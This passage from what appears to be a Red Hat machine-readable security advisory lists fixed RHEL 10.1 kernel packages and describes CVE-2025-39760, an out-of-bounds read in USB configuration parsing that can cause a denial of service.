"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: drm/xe: Make dma-fences compliant with the safe access rules"
},
{
"cve": "CVE-2025-39760",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2025-09-11T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394601"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s USB core configuration parsing. Specifically, the `usb_parse_ss_endpoint_companion()` function incorrectly checks the descriptor type before its length, which can lead to reading data beyond the intended buffer. This out-of-bounds read vulnerability could allow a local attacker to cause a system crash, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Denial of Service via out-of-bounds read in USB configuration parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact flaw in the Linux kernel\u0027s USB core configuration parsing allows a local attacker with some special group privilege to trigger an out-of-bounds read by manipulating USB device core configuration options. This can lead to a system crash, resulting in a Denial of Service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
